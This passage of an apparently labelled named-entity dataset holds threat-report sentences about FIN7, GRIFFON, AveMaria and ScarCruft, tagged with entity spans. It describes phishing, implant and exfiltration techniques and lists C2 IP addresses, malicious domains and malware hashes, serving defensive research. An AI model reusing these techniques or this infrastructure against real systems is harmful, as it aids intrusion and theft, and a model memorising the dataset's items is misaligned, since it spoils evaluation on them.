C:\\Windows\\System32\\Tasks\\At1 and 
C:\\Windows\\Tasks\\At1.job .", "spans": {"Indicator: C:\\Windows\\Tasks\\At1.job": [[102, 126]]}, "info": {"id": "aptner_train_002353", "source": "aptner_train"}} {"text": "The first file is an Extensible Markup Language ( XML ) file that can be opened and viewed in a text editor .", "spans": {"System: Extensible Markup Language": [[21, 47]], "System: XML": [[50, 53]]}, "info": {"id": "aptner_train_002354", "source": "aptner_train"}} {"text": "The second file follows a decodable binary format .", "spans": {}, "info": {"id": "aptner_train_002355", "source": "aptner_train"}} {"text": "The operating system also creates a registry key within the software registry hive that is specifically associated with the creation of the scheduled task on the destination host : Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\At1 .", "spans": {"System: Microsoft\\Windows": [[181, 198]]}, "info": {"id": "aptner_train_002356", "source": "aptner_train"}} {"text": "The Task Scheduler service names the tasks , so subsequent tasks are named At2 , At3 , and so on .", "spans": {}, "info": {"id": "aptner_train_002357", "source": "aptner_train"}} {"text": "FIN7.5 : the infamous cybercrime rig FIN7 continues its activities .", "spans": {"Organization: FIN7.5": [[0, 6]], "Organization: FIN7": [[37, 41]]}, "info": {"id": "aptner_train_002358", "source": "aptner_train"}} {"text": "On August 1, 2018 , the US Department of Justice announced that it had arrested several individuals suspected of having ties to the FIN7 cybercrime rig .", "spans": {"Organization: Department of Justice": [[27, 48]], "Organization: FIN7": [[132, 136]]}, "info": {"id": "aptner_train_002359", "source": "aptner_train"}} {"text": "Interestingly , this threat actor created fake companies in order to hire remote pentesters , developers and interpreters to participate in their malicious business .", "spans": {}, "info": {"id": "aptner_train_002361", "source": "aptner_train"}} {"text": "The main goal behind 
its malicious activities was to steal financial assets from companies , such as debit cards , or get access to financial data or computers of finance department employees in order to conduct wire transfers to offshore accounts .", "spans": {}, "info": {"id": "aptner_train_002362", "source": "aptner_train"}} {"text": "In 2018-2019 , researchers of Kaspersky Lab ’s Global Research and Analysis Team analyzed various campaigns that used the same Tactics Tools and Procedures ( TTPs ) as the historic FIN7 , leading the researchers to believe that this threat actor had remained active despite the 2018 arrests .", "spans": {"Organization: Kaspersky": [[30, 39]], "Organization: Global Research and Analysis Team": [[47, 80]], "Organization: FIN7": [[181, 185]]}, "info": {"id": "aptner_train_002363", "source": "aptner_train"}} {"text": "Kaspersky Lab has been able to retrieve some of these exchanges from a FIN7 target .", "spans": {"Organization: Kaspersky Lab": [[0, 13]], "Organization: FIN7": [[71, 75]]}, "info": {"id": "aptner_train_002366", "source": "aptner_train"}} {"text": "The spear phishing campaigns were remarkably sophisticated from a social engineering perspective .", "spans": {}, "info": {"id": "aptner_train_002367", "source": "aptner_train"}} {"text": "In various cases , the operators exchanged numerous messages with their victims for weeks before sending their malicious documents .", "spans": {}, "info": {"id": "aptner_train_002368", "source": "aptner_train"}} {"text": "The emails were efficient social-engineering attempts that appealed to a vast number of human emotions ( fear , stress , anger , etc. 
) to elicit a response from their victims .", "spans": {"System: emails": [[4, 10]]}, "info": {"id": "aptner_train_002369", "source": "aptner_train"}} {"text": "One of the domains used by the attackers in their 2018 campaign of spear phishing contained more than 130 email aliases , leading us to think that more than 130 companies had been targeted by the end of 2018 .", "spans": {"System: email": [[106, 111]]}, "info": {"id": "aptner_train_002370", "source": "aptner_train"}} {"text": "We have seen two types of documents sent to victims in these spear phishing campaigns .", "spans": {}, "info": {"id": "aptner_train_002371", "source": "aptner_train"}} {"text": "The first one exploits the INCLUDEPICTURE feature of Microsoft Word to get context information about the victim’s computer , and the availability and version number of Microsoft Word .", "spans": {"System: INCLUDEPICTURE": [[27, 41]], "Organization: Microsoft": [[53, 62], [168, 177]], "System: Word": [[63, 67], [178, 182]]}, "info": {"id": "aptner_train_002372", "source": "aptner_train"}} {"text": "The second one , which in many cases is an Office document protected with a trivial password , such as “ 12345 ” , “ 1234 ” , etc. 
, uses macros to execute a GRIFFON implant on the target’s computer .", "spans": {"System: Office": [[43, 49]], "System: macros": [[138, 144]], "Malware: GRIFFON": [[158, 165]]}, "info": {"id": "aptner_train_002373", "source": "aptner_train"}} {"text": "In various cases , the associated macro also scheduled tasks to make GRIFFON persistent .", "spans": {"System: macro": [[34, 39]], "Malware: GRIFFON": [[69, 76]]}, "info": {"id": "aptner_train_002374", "source": "aptner_train"}} {"text": "The new builder inserts random values in the Author and Company metadata fields .", "spans": {}, "info": {"id": "aptner_train_002376", "source": "aptner_train"}} {"text": "Moreover , the builder allows these to modify different IOCs , such as the filenames of wscript.exe or sctasks.exe copies , etc .", "spans": {"System: IOCs": [[56, 60]], "Indicator: wscript.exe": [[88, 99]], "Indicator: sctasks.exe": [[103, 114]]}, "info": {"id": "aptner_train_002377", "source": "aptner_train"}} {"text": "The GRIFFON implant is a lightweight JScript validator-style implant without any persistence mechanism .", "spans": {"Malware: GRIFFON": [[4, 11]], "System: JScript": [[37, 44]]}, "info": {"id": "aptner_train_002378", "source": "aptner_train"}} {"text": "The malware is designed for receiving modules to be executed in-memory and sending the results to C2s .", "spans": {}, "info": {"id": "aptner_train_002379", "source": "aptner_train"}} {"text": "We were able to obtain four different modules during the investigation .", "spans": {}, "info": {"id": "aptner_train_002380", "source": "aptner_train"}} {"text": "This module mainly relies on WMI and Windows objects to deliver results , which will be sent back to the operators .", "spans": {"System: WMI": [[29, 32]], "System: Windows": [[37, 44]]}, "info": {"id": "aptner_train_002382", "source": "aptner_train"}} {"text": "Interestingly , more than 20 artifacts are retrieved from the system by this implant during the reconnaissance stage , from the date 
and time of operating system installation and membership in a Windows domain to a list of and the resolutions of the workstation’s monitors .", "spans": {"System: Windows": [[195, 202]]}, "info": {"id": "aptner_train_002383", "source": "aptner_train"}} {"text": "The second module is used by the operators to execute an obfuscated PowerShell script , which contains a Meterpreter downloader widely known as “ Tinymet “ .", "spans": {"System: PowerShell": [[68, 78]], "System: Meterpreter": [[105, 116]], "System: downloader": [[117, 127]], "System: Tinymet": [[146, 153]]}, "info": {"id": "aptner_train_002384", "source": "aptner_train"}} {"text": "This downloader , seen in past FIN7 campaigns , downloads a one-byte XOR encrypted ( eg. with the key equal to 0x50 or 0x51 ) piece of meterpreter shellcode to execute .", "spans": {"System: downloader": [[5, 15]], "Organization: FIN7": [[31, 35]], "System: meterpreter": [[135, 146]]}, "info": {"id": "aptner_train_002385", "source": "aptner_train"}} {"text": "The third module allows the operators to take a screenshot of the remote system .", "spans": {}, "info": {"id": "aptner_train_002386", "source": "aptner_train"}} {"text": "To do that , it also drops a PowerShell script on the workstation to execute .", "spans": {"System: PowerShell": [[29, 39]]}, "info": {"id": "aptner_train_002387", "source": "aptner_train"}} {"text": "The script executes an open-source .NET class used for taking a screenshot .", "spans": {"Indicator: .NET": [[35, 39]]}, "info": {"id": "aptner_train_002388", "source": "aptner_train"}} {"text": "The resulting screenshot is saved at “ %TMP%/image.png ” , sent back to the attackers by the GRIFFON implant and then deleted .", "spans": {"Indicator: %TMP%/image.png": [[39, 54]], "Malware: GRIFFON": [[93, 100]]}, "info": {"id": "aptner_train_002389", "source": "aptner_train"}} {"text": "The last retrieved module is a persistence module .", "spans": {}, "info": {"id": "aptner_train_002390", "source": 
"aptner_train"}} {"text": "If the victim appears valuable to the attackers , a GRIFFON implant installer is pushed to the victim’s workstation .", "spans": {"Malware: GRIFFON": [[52, 59]], "System: installer": [[68, 77]]}, "info": {"id": "aptner_train_002391", "source": "aptner_train"}} {"text": "This module stores another instance of the GRIFFON implant inside the registry to achieve persistence .", "spans": {"Malware: GRIFFON": [[43, 50]]}, "info": {"id": "aptner_train_002392", "source": "aptner_train"}} {"text": "Here is a PowerLinks style method used by the attackers to achieve persistence and execute the GRIFFON implant at each user logon .", "spans": {"System: PowerLinks": [[10, 20]], "Malware: GRIFFON": [[95, 102]]}, "info": {"id": "aptner_train_002393", "source": "aptner_train"}} {"text": "Through its light weight and modular architecture , the GRIFFON implant is the perfect validator .", "spans": {"Malware: GRIFFON": [[56, 63]]}, "info": {"id": "aptner_train_002395", "source": "aptner_train"}} {"text": "Even though we have been able to retrieve four different modules , it is possible that the FIN7 operators have more modules in their toolsets for achieving their objectives on the victim’s workstation .", "spans": {"Organization: FIN7": [[91, 95]]}, "info": {"id": "aptner_train_002396", "source": "aptner_train"}} {"text": "Attackers make mistakes , and FIN7 are no exception .", "spans": {"Organization: FIN7": [[30, 34]]}, "info": {"id": "aptner_train_002397", "source": "aptner_train"}} {"text": "The major error made by its operators allowed us to follow the command and control server of the GRIFFON implant last year .", "spans": {"Malware: GRIFFON": [[97, 104]]}, "info": {"id": "aptner_train_002398", "source": "aptner_train"}} {"text": "In order to trick blue teams and other DFIR analysts , the operators created fake HTTP 302 redirection to various Google services on their C2s servers .", "spans": {"System: DFIR": [[39, 43]], "Organization: Google": [[114, 
120]]}, "info": {"id": "aptner_train_002399", "source": "aptner_train"}} {"text": "This error allowed us to follow the infrastructure week by week , until an individual pushed on Twitter the heuristic to track their C2 at the end of December 2018 .", "spans": {"Organization: Twitter": [[96, 103]], "System: C2": [[133, 135]]}, "info": {"id": "aptner_train_002400", "source": "aptner_train"}} {"text": "A few days after the tweet , in January 2019 , the operators changed their landing page in order to prevent this type of tracking against their infrastructure .", "spans": {}, "info": {"id": "aptner_train_002401", "source": "aptner_train"}} {"text": "During the investigation related to the GRIFFON infrastructure , we found a strange overlap between the WHOIS record of an old GRIFFON C2 and the website of a fake company .", "spans": {"Malware: GRIFFON": [[40, 47], [127, 134]], "System: WHOIS": [[104, 109]], "System: C2": [[135, 137]]}, "info": {"id": "aptner_train_002402", "source": "aptner_train"}} {"text": "According to the website , that domain supposedly belongs to a legitimate security company “ fully owned by the Russian Government ” ( sic . 
) and having offices in “ Moscow , Saint Petersburg and Yekaterinburg ” , but the address says the company is located in Trump Tower , in New York .", "spans": {"Organization: Russian Government": [[112, 130]], "Organization: Trump Tower": [[262, 273]]}, "info": {"id": "aptner_train_002403", "source": "aptner_train"}} {"text": "Given FIN7 ’s previous use of false security companies , we decided to look deeper into this one .", "spans": {"Organization: FIN7": [[6, 10]]}, "info": {"id": "aptner_train_002404", "source": "aptner_train"}} {"text": "As we were looking at the content of the website , it became evident that almost all of the text used was lifted from legitimate security-company websites .", "spans": {}, "info": {"id": "aptner_train_002405", "source": "aptner_train"}} {"text": "Phrases and sentences were borrowed from at least the following companies/sites : DKSec – www.dksec.com , OKIOK – www.okiok.com/services/tailored-solutions , MainNerve – www.mainnerve.com , Datics – www.datatics.com/cyber-security , Perspective Risk – www.perspectiverisk.com , Synack – https://www.synack.com/company , FireEye – https://www.fireeye.com/services/penetration-testing.html .", "spans": {"Organization: DKSec": [[82, 87]], "Indicator: www.dksec.com": [[90, 103]], "Organization: OKIOK": [[106, 111]], "Indicator: www.okiok.com/services/tailored-solutions": [[114, 155]], "Organization: MainNerve": [[158, 167]], "Indicator: www.mainnerve.com": [[170, 187]], "Organization: Datics": [[190, 196]], "Indicator: www.datatics.com/cyber-security": [[199, 230]], "Organization: Perspective Risk": [[233, 249]], "Indicator: www.perspectiverisk.com": [[252, 275]], "Organization: Synack": [[278, 284]], "Indicator: https://www.synack.com/company": [[287, 317]], "Organization: FireEye": [[320, 327]], "Indicator: https://www.fireeye.com/services/penetration-testing.html": [[330, 387]]}, "info": {"id": "aptner_train_002406", "source": "aptner_train"}} {"text": "This company seems to have been 
used by the FIN7 threat actor to hire new people as translators , developers and pentesters .", "spans": {"Organization: FIN7": [[44, 48]]}, "info": {"id": "aptner_train_002407", "source": "aptner_train"}} {"text": "During our research , we found various job advertisements associated with the company on freelance and remote-work websites .", "spans": {}, "info": {"id": "aptner_train_002408", "source": "aptner_train"}} {"text": "While tracking numerous threat actors on a daily basis during the final days of 2018 and at the beginning of 2019 , we discovered various activity clusters sharing certain TTPs associated with the FIN7 intrusion set .", "spans": {"Organization: FIN7": [[197, 201]]}, "info": {"id": "aptner_train_002409", "source": "aptner_train"}} {"text": "The link between these threat actors and FIN7 is still weak , but we decided to disclose a few hints regarding these in this blog post .", "spans": {"Organization: FIN7": [[41, 45]]}, "info": {"id": "aptner_train_002410", "source": "aptner_train"}} {"text": "In his history , FIN7 has overlapped several times with Cobalt in terms of TTPs .", "spans": {"Organization: FIN7": [[17, 21]], "Malware: Cobalt": [[56, 62]]}, "info": {"id": "aptner_train_002411", "source": "aptner_train"}} {"text": "After a successful penetration , it uses its own backdoors and the CobaltStrike framework or Powershell Empire components to hop to interesting parts of the network , where it can monetize its access .", "spans": {"System: CobaltStrike": [[67, 79]], "System: Powershell": [[93, 103]], "System: Empire": [[104, 110]]}, "info": {"id": "aptner_train_002414", "source": "aptner_train"}} {"text": "FIN7 ’s last campaigns were targeting banks in Europe and Central America .", "spans": {"Organization: FIN7": [[0, 4]]}, "info": {"id": "aptner_train_002415", "source": "aptner_train"}} {"text": "A few interesting overlaps in recent FIN7 campaigns : Both used macros to copy wscript.exe to another file , which began with “ ms ” ( 
mses.exe – FIN7 , msutil.exe – EmpireMonkey ) .", "spans": {"Organization: FIN7": [[37, 41], [146, 150]], "System: macros": [[64, 70]], "Indicator: wscript.exe": [[79, 90]], "Indicator: mses.exe": [[135, 143]], "Indicator: msutil.exe": [[153, 163]], "Malware: EmpireMonkey": [[166, 178]]}, "info": {"id": "aptner_train_002417", "source": "aptner_train"}} {"text": "Both executed a JScript file named “ error ” in %TEMP% ( Errors.txt in the case of FIN7 , Errors.bat for EmpireMonkey ) .", "spans": {"System: JScript": [[16, 23]], "Indicator: Errors.txt": [[57, 67]], "Organization: FIN7": [[83, 87]], "Indicator: Errors.bat": [[90, 100]], "Malware: EmpireMonkey": [[105, 117]]}, "info": {"id": "aptner_train_002418", "source": "aptner_train"}} {"text": "Both used DocuSign decoy documents with different macros .", "spans": {"System: DocuSign": [[10, 18]], "System: macros": [[50, 56]]}, "info": {"id": "aptner_train_002419", "source": "aptner_train"}} {"text": "The macros popped the same “ Document decryption error ” error message—even if macro code remain totally different .", "spans": {"System: macros": [[4, 10]], "System: macro": [[79, 84]]}, "info": {"id": "aptner_train_002420", "source": "aptner_train"}} {"text": "We have a high level of confidence in a historic association between FIN7 and Cobalt , even though we believe that these two clusters of activity are operated by different teams .", "spans": {"Organization: FIN7": [[69, 73]], "Malware: Cobalt": [[78, 84]]}, "info": {"id": "aptner_train_002421", "source": "aptner_train"}} {"text": "We have medium confidence that this botnet falls under the FIN7 umbrella .", "spans": {"Organization: FIN7": [[59, 63]]}, "info": {"id": "aptner_train_002423", "source": "aptner_train"}} {"text": "Since the beginning of 2019 , we have collected more than 1300 samples and extracted more than 130 C2s .", "spans": {}, "info": {"id": "aptner_train_002425", "source": "aptner_train"}} {"text": "What is interesting , in some emails , they ask 
targets to phone them if they have any questions , like the FIN7 guys do .", "spans": {"System: emails": [[30, 36]], "Organization: FIN7": [[108, 112]]}, "info": {"id": "aptner_train_002428", "source": "aptner_train"}} {"text": "During the investigation into FIN7 , our threat-hunting systems found an interesting overlap in between the infrastructure of FIN7 and AveMaria .", "spans": {"Organization: FIN7": [[30, 34], [126, 130]], "Malware: AveMaria": [[135, 143]]}, "info": {"id": "aptner_train_002429", "source": "aptner_train"}} {"text": "Basically , two servers in the same IP range and AS14576 ( autonomous system ) share a non-standard SSH port , which is 222 .", "spans": {}, "info": {"id": "aptner_train_002430", "source": "aptner_train"}} {"text": "One of the servers is a Griffon C2, and the other one , an AveMaria C2 .", "spans": {"Malware: Griffon": [[24, 31]], "Malware: AveMaria": [[59, 67]], "System: C2": [[68, 70]]}, "info": {"id": "aptner_train_002431", "source": "aptner_train"}} {"text": "Distribution of targets is another factor suggesting that these two malware families may be connected .", "spans": {}, "info": {"id": "aptner_train_002432", "source": "aptner_train"}} {"text": "We analyzed AveMaria targets during February and March of 2019 .", "spans": {"Malware: AveMaria": [[12, 20]]}, "info": {"id": "aptner_train_002433", "source": "aptner_train"}} {"text": "The spearphishing emails were sent to various kinds of businesses only and did not target individuals .", "spans": {"System: emails": [[18, 24]]}, "info": {"id": "aptner_train_002434", "source": "aptner_train"}} {"text": "Thirty percent of the targets were small and medium-sized companies that were suppliers or service providers for bigger players and 21% were various types of manufacturing companies .", "spans": {}, "info": {"id": "aptner_train_002435", "source": "aptner_train"}} {"text": "We also spotted several typical FIN7 targets , such as retailers and hotels .", "spans": {"Organization: FIN7": 
[[32, 36]]}, "info": {"id": "aptner_train_002436", "source": "aptner_train"}} {"text": "Most AveMaria targets ( 72% ) were in the EU .", "spans": {"Malware: AveMaria": [[5, 13]], "Organization: EU": [[42, 44]]}, "info": {"id": "aptner_train_002437", "source": "aptner_train"}} {"text": "This set of activity relied on open-source tools , such as Powershell Empire , and well-documented red teaming techniques , in order to get a foothold within the victim’s networks and avoid detection .", "spans": {"System: Powershell": [[59, 69]], "System: Empire": [[70, 76]]}, "info": {"id": "aptner_train_002440", "source": "aptner_train"}} {"text": "The links between CopyPaste and FIN7 are still very weak .", "spans": {"Organization: CopyPaste": [[18, 27]], "Organization: FIN7": [[32, 36]]}, "info": {"id": "aptner_train_002441", "source": "aptner_train"}} {"text": "It is possible that the CopyPaste operators were influenced by open-source publications and do not have any ties with FIN7 .", "spans": {"Organization: CopyPaste": [[24, 33]], "Organization: FIN7": [[118, 122]]}, "info": {"id": "aptner_train_002442", "source": "aptner_train"}} {"text": "During 2018 , Europol and DoJ announced the arrest of the leader of the FIN7 and Carbanak cybercrime groups .", "spans": {"Organization: Europol": [[14, 21]], "Organization: DoJ": [[26, 29]], "Organization: FIN7": [[72, 76]], "Organization: Carbanak": [[81, 89]]}, "info": {"id": "aptner_train_002443", "source": "aptner_train"}} {"text": "It was believed that the arrest of the group leader will have an impact on the group’s operations .", "spans": {}, "info": {"id": "aptner_train_002444", "source": "aptner_train"}} {"text": "However , recent data seems to indicate that the attacks have continued without significant drawbacks .", "spans": {}, "info": {"id": "aptner_train_002445", "source": "aptner_train"}} {"text": "One may say CobaltGoblin and FIN7 have even extended the number of groups operating under their umbrella .", "spans": 
{"Organization: CobaltGoblin": [[12, 24]], "Organization: FIN7": [[29, 33]]}, "info": {"id": "aptner_train_002446", "source": "aptner_train"}} {"text": "They rely on a Griffon JS backdoor and Cobalt , and in recent attacks , Powershell Empire .", "spans": {"Malware: Griffon": [[15, 22]], "System: JS": [[23, 25]], "Malware: Cobalt": [[39, 45]], "System: Powershell": [[72, 82]], "System: Empire": [[83, 89]]}, "info": {"id": "aptner_train_002449", "source": "aptner_train"}} {"text": "The second one is CobaltGoblin , which uses the same toolkit , techniques and similar infrastructure but targets only financial institutions and associated software/services providers .", "spans": {"Organization: CobaltGoblin": [[18, 30]]}, "info": {"id": "aptner_train_002450", "source": "aptner_train"}} {"text": "We link the AveMaria botnet to these two groups with medium confidence : AveMaria ’s targets are mostly suppliers for big companies , and the way AveMaria manages its infrastructure is very similar to FIN7 .", "spans": {"Malware: AveMaria": [[12, 20], [73, 81], [146, 154]], "Organization: FIN7": [[201, 205]]}, "info": {"id": "aptner_train_002451", "source": "aptner_train"}} {"text": "The links between CopyPaste and FIN7 are still very weak .", "spans": {"Organization: CopyPaste": [[18, 27]], "Organization: FIN7": [[32, 36]]}, "info": {"id": "aptner_train_002453", "source": "aptner_train"}} {"text": "It is possible that the operators of this cluster of activity were influenced by open-source publications and do not have any ties with FIN7 .", "spans": {"Organization: FIN7": [[136, 140]]}, "info": {"id": "aptner_train_002454", "source": "aptner_train"}} {"text": "All of the aforementioned groups greatly benefit from unpatched systems in corporate environments .", "spans": {}, "info": {"id": "aptner_train_002455", "source": "aptner_train"}} {"text": "They thus continue to use effective spearphishing campaigns in conjunction with well-known MS Office exploits generated by the 
framework .", "spans": {"Organization: MS": [[91, 93]], "System: Office": [[94, 100]]}, "info": {"id": "aptner_train_002456", "source": "aptner_train"}} {"text": "So far , the groups have not used any zero-days .", "spans": {"Vulnerability: zero-days": [[38, 47]]}, "info": {"id": "aptner_train_002457", "source": "aptner_train"}} {"text": "FIN7 phishing documents may seem basic , but when combined with their extensive social engineering and focused targeting , they are quite successful .", "spans": {"Organization: FIN7": [[0, 4]]}, "info": {"id": "aptner_train_002458", "source": "aptner_train"}} {"text": "As with their previous fake company “ Combi Security ” , we are confident that they continue to create new personas for use in either targeting or recruiting under a “ new ” brand , “ IPC ” .", "spans": {"Organization: Combi Security": [[38, 52]], "Organization: IPC": [[184, 187]]}, "info": {"id": "aptner_train_002459", "source": "aptner_train"}} {"text": "AveMaria : 185.61.138.249 tain.warzonedns.com noreply377.ddns.net 185.162.131.97 91.192.100.62 server.mtcc.me doddyfire.dyndns.org 212.8.240.116 168.167.45.162 toekie.ddns.net warmaha.warzonedns.com .", "spans": {"Malware: AveMaria": [[0, 8]], "Indicator: 185.61.138.249": [[11, 25]], "Indicator: tain.warzonedns.com": [[26, 45]], "Indicator: noreply377.ddns.net": [[46, 65]], "Indicator: 185.162.131.97": [[66, 80]], "Indicator: 91.192.100.62": [[81, 94]], "Indicator: server.mtcc.me": [[95, 109]], "Indicator: doddyfire.dyndns.org": [[110, 130]], "Indicator: 212.8.240.116": [[131, 144]], "Indicator: 168.167.45.162": [[145, 159]], "Indicator: toekie.ddns.net": [[160, 175]], "Indicator: warmaha.warzonedns.com": [[176, 198]]}, "info": {"id": "aptner_train_002460", "source": "aptner_train"}} {"text": "CopyPaste : digi-cert.org somtelnetworks.com geotrusts.com secureclientupdate.com digicertweb.com sport-pesa.org itaxkenya.com businessdailyafrica.net infotrak-research.com nairobiwired.com k-24tv.com .", "spans": 
{"Organization: CopyPaste": [[0, 9]], "Indicator: digi-cert.org": [[12, 25]], "Indicator: somtelnetworks.com": [[26, 44]], "Indicator: geotrusts.com": [[45, 58]], "Indicator: secureclientupdate.com": [[59, 81]], "Indicator: digicertweb.com": [[82, 97]], "Indicator: sport-pesa.org": [[98, 112]], "Indicator: itaxkenya.com": [[113, 126]], "Indicator: businessdailyafrica.net": [[127, 150]], "Indicator: infotrak-research.com": [[151, 172]], "Indicator: nairobiwired.com": [[173, 189]], "Indicator: k-24tv.com": [[190, 200]]}, "info": {"id": "aptner_train_002461", "source": "aptner_train"}} {"text": "FIN7 : hpservice-cdn.com realtek-cdn.com logitech-cdn.com pci-cdn.com appleservice-cdn.com servicebing-cdn.com .", "spans": {"Organization: FIN7": [[0, 4]], "Indicator: hpservice-cdn.com": [[7, 24]], "Indicator: realtek-cdn.com": [[25, 40]], "Indicator: logitech-cdn.com": [[41, 57]], "Indicator: pci-cdn.com": [[58, 69]], "Indicator: appleservice-cdn.com": [[70, 90]], "Indicator: servicebing-cdn.com": [[91, 110]]}, "info": {"id": "aptner_train_002462", "source": "aptner_train"}} {"text": "ScarCruft continues to evolve, introduces Bluetooth harvester .", "spans": {"Organization: ScarCruft": [[0, 9]], "System: Bluetooth": [[42, 51]]}, "info": {"id": "aptner_train_002463", "source": "aptner_train"}} {"text": "We recently discovered some interesting telemetry on this actor , and decided to dig deeper into ScarCruft ’s recent activity .", "spans": {"Organization: ScarCruft": [[97, 106]]}, "info": {"id": "aptner_train_002466", "source": "aptner_train"}} {"text": "This shows that the actor is still very active and constantly trying to elaborate its attack tools .", "spans": {}, "info": {"id": "aptner_train_002467", "source": "aptner_train"}} {"text": "Based on our telemetry , we can reassemble ScarCruft ’s binary infection procedure .", "spans": {"Organization: ScarCruft": [[43, 52]]}, "info": {"id": "aptner_train_002468", "source": "aptner_train"}} {"text": "It used a multi-stage 
binary infection to update each module effectively and evade detection .", "spans": {}, "info": {"id": "aptner_train_002469", "source": "aptner_train"}} {"text": "In addition , we analyzed the victims of this campaign and spotted an interesting overlap of this campaign with another APT actor known as DarkHotel .", "spans": {"Organization: DarkHotel": [[139, 148]]}, "info": {"id": "aptner_train_002470", "source": "aptner_train"}} {"text": "As in Operation Daybreak , this actor performs sophisticated attacks using a zero-day exploit .", "spans": {"Malware: zero-day": [[77, 85]]}, "info": {"id": "aptner_train_002472", "source": "aptner_train"}} {"text": "However , sometimes using public exploit code is quicker and more effective for malware authors .", "spans": {}, "info": {"id": "aptner_train_002473", "source": "aptner_train"}} {"text": "We witnessed this actor extensively testing a known public exploit during its preparation for the next campaign .", "spans": {}, "info": {"id": "aptner_train_002474", "source": "aptner_train"}} {"text": "In order to deploy an implant for the final payload , ScarCruft uses a multi-stage binary infection scheme .", "spans": {"Organization: ScarCruft": [[54, 63]]}, "info": {"id": "aptner_train_002475", "source": "aptner_train"}} {"text": "As a rule , the initial dropper is created by the infection procedure .", "spans": {}, "info": {"id": "aptner_train_002476", "source": "aptner_train"}} {"text": "In order to evade network level detection , the downloader uses steganography .", "spans": {"System: downloader": [[48, 58]]}, "info": {"id": "aptner_train_002481", "source": "aptner_train"}} {"text": "The downloaded payload is an image file , but it contains an appended malicious payload to be decrypted .", "spans": {}, "info": {"id": "aptner_train_002482", "source": "aptner_train"}} {"text": "The final payload created by the aforementioned process is a well known backdoor , also known as ROKRAT by Cisco Talos .", "spans": {"Malware: ROKRAT": 
[[97, 103]], "Organization: Cisco Talos": [[107, 118]]}, "info": {"id": "aptner_train_002483", "source": "aptner_train"}} {"text": "This cloud service-based backdoor contains many features .", "spans": {}, "info": {"id": "aptner_train_002484", "source": "aptner_train"}} {"text": "One of its main functions is to steal information .", "spans": {}, "info": {"id": "aptner_train_002485", "source": "aptner_train"}} {"text": "Upon execution , this malware creates 10 random directory paths and uses them for a specially designated purpose .", "spans": {}, "info": {"id": "aptner_train_002486", "source": "aptner_train"}} {"text": "The malware creates 11 threads simultaneously : six threads are responsible for stealing information from the infected host , and five threads are for forwarding collected data to four cloud services ( Box , Dropbox , Pcloud and Yandex ) .", "spans": {"System: Box": [[202, 205]], "System: Dropbox": [[208, 215]], "System: Pcloud": [[218, 224]], "System: Yandex": [[229, 235]]}, "info": {"id": "aptner_train_002487", "source": "aptner_train"}} {"text": "When uploading stolen data to a cloud service , it uses predefined directory path such as /english , /video or /scriptout .", "spans": {}, "info": {"id": "aptner_train_002488", "source": "aptner_train"}} {"text": "The ScarCruft group keeps expanding its Exfiltration targets to steal further information from infected hosts and continues to create tools for additional data Exfiltration .", "spans": {"Organization: ScarCruft": [[4, 13]]}, "info": {"id": "aptner_train_002489", "source": "aptner_train"}} {"text": "This malware is responsible for stealing Bluetooth device information .", "spans": {"System: Bluetooth": [[41, 50]]}, "info": {"id": "aptner_train_002491", "source": "aptner_train"}} {"text": "It is fetched by a downloader , and collects information directly from the infected host .", "spans": {}, "info": {"id": "aptner_train_002492", "source": "aptner_train"}} {"text": "This malware uses Windows 
Bluetooth APIs to find information on connected Bluetooth devices and saves the following information .", "spans": {"System: Windows": [[18, 25]], "System: Bluetooth": [[26, 35], [74, 83]]}, "info": {"id": "aptner_train_002493", "source": "aptner_train"}} {"text": "We have found several victims of this campaign , based on our telemetry – investment and trading companies in Vietnam and Russia .", "spans": {}, "info": {"id": "aptner_train_002494", "source": "aptner_train"}} {"text": "We discovered one victim from Russia that also triggered a malware detection while staying in North Korea in the past .", "spans": {}, "info": {"id": "aptner_train_002498", "source": "aptner_train"}} {"text": "The fact that this victim visits North Korea makes its special and suggests that it may have valuable information about North Korean affairs .", "spans": {}, "info": {"id": "aptner_train_002499", "source": "aptner_train"}} {"text": "ScarCruft infected this victim on September 21, 2018 .", "spans": {"Organization: ScarCruft": [[0, 9]]}, "info": {"id": "aptner_train_002500", "source": "aptner_train"}} {"text": "GreezeBackdoor is a tool of the DarkHotel APT group , which we have previously written about .", "spans": {"Malware: GreezeBackdoor": [[0, 14]], "Organization: DarkHotel": [[32, 41]]}, "info": {"id": "aptner_train_002502", "source": "aptner_train"}} {"text": "In addition , this victim was also attacked by the Konni malware on 03 April 2018 .", "spans": {"Malware: Konni": [[51, 56]]}, "info": {"id": "aptner_train_002503", "source": "aptner_train"}} {"text": "The Konni malware was disguised as a North Korean news item in a weaponized documents ( the name of the document was “ Why North Korea slams South Korea ’s recent defense talks with U.S-Japan.zip ” ) This is not the first time we have seen an overlap of ScarCruft and DarkHotel actors .", "spans": {"Malware: Konni": [[4, 9]], "Indicator: U.S-Japan.zip": [[182, 195]], "Organization: ScarCruft": [[254, 263]], "Organization: 
DarkHotel": [[268, 277]]}, "info": {"id": "aptner_train_002504", "source": "aptner_train"}} {"text": "Members from our team have already presented on the conflict of these two threat actors at security conferences .", "spans": {}, "info": {"id": "aptner_train_002505", "source": "aptner_train"}} {"text": "We have also shared more details with our threat intelligence customers in the past .", "spans": {}, "info": {"id": "aptner_train_002506", "source": "aptner_train"}} {"text": "They are both Korean-speaking threat actors and sometimes their victimology overlaps .", "spans": {}, "info": {"id": "aptner_train_002507", "source": "aptner_train"}} {"text": "But both group seem to have different TTPs ( Tactics , Techniques and Procedures ) and it leads us to believe that one group regularly lurks in the other ’s shadow .", "spans": {}, "info": {"id": "aptner_train_002508", "source": "aptner_train"}} {"text": "The ScarCruft has shown itself to be a highly-skilled and active group .", "spans": {"Organization: ScarCruft": [[4, 13]]}, "info": {"id": "aptner_train_002509", "source": "aptner_train"}} {"text": "It has a keen interest in North Korean affairs , attacking those in the business sector who may have any connection to North Korea , as well as diplomatic agencies around the globe .", "spans": {}, "info": {"id": "aptner_train_002510", "source": "aptner_train"}} {"text": "ScarCruft tools : 02681a7fe708f39beb7b3cf1bd557ee9 Bluetooth info harvester .", "spans": {"Organization: ScarCruft": [[0, 9]], "Indicator: 02681a7fe708f39beb7b3cf1bd557ee9": [[18, 50]], "System: Bluetooth": [[51, 60]]}, "info": {"id": "aptner_train_002511", "source": "aptner_train"}} {"text": "ScarCruft tools : C781f5fad9b47232b3606e4d374900cd Installer .", "spans": {"Organization: ScarCruft": [[0, 9]], "Indicator: C781f5fad9b47232b3606e4d374900cd": [[18, 50]], "System: Installer": [[51, 60]]}, "info": {"id": "aptner_train_002512", "source": "aptner_train"}} {"text": 